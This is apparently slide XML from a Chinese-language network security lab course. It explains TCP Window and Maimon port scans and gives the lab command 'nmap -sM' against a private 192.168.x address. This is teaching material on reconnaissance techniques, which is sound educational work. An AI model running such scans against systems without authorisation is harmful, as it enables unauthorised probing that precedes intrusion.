            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="文本框 102"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5492115" y="1859915"/>
            <a:ext cx="5080000" cy="3138170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>TCP窗口扫描：也就是Window扫描，这里的Window扫描指的并不是对 Windows操作系统扫描而是指一种扫描方式。它和ACK扫描的发送方式基本是一样的，是通过检查服务器返回的RST包的TCP窗口域来判断服务器的目标端口是否开放。如果TCP 窗口的值是正数，则表示目标端口开放；如果TCP窗口的值是0，则表示端口是关闭的。TCP Maimon扫描：和TCP隐蔽扫描完全一样，都是发送FIN/ACK标志的数据包。根据RFC 793的规定，不管服务器的端口是开放还是关闭都会返回RST响应包。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行TCP Maimon的主机端口扫描并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤六</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>06</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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5" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="文本框 102"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5300345" y="1686560"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.使用“nmap -sM 192.168.172.129”命令对目标主机进行TCP Maimon扫描，如图2-2-46所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5300345" y="2331720"/>
            <a:ext cx="5276850" cy="1657350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="文本框 103"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5300345" y="3989070"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-46 TCP Maimon扫描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行TCP Maimon的主机端口扫描并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤六</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>06</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
